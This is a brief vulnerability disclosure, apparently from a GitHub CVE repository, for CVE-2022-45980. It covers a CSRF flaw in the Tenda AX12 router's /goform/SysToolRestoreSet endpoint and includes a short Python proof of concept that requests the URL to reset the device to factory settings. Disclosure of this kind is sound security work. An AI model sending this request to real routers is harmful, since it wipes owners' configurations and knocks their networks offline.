Headline
CVE-2022-45980: IOT-CVE/Tenda/AX12/6 at master · The-Itach1/IOT-CVE
Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via /goform/SysToolRestoreSet .
Vulnerability description
Affect device:Tenda-AX12 V22.03.01.21_CN(https://www.tenda.com.cn/download/detail-3237.html)
Vulnerability Type: Cross Site Request Forgery (CSRF)
Impact: Device reset to factory settings
Vulnerability cause
Provided /goform/SysToolRestoreSet interface function, under the premise of authentication, it allows remote attackers to restore the device to factory settings.
POC
On the premise of authentication, just visit this interface.
import requests
url = “http://ip/goform/SysToolRestoreSet”
r = requests.get(url)
print(r.content)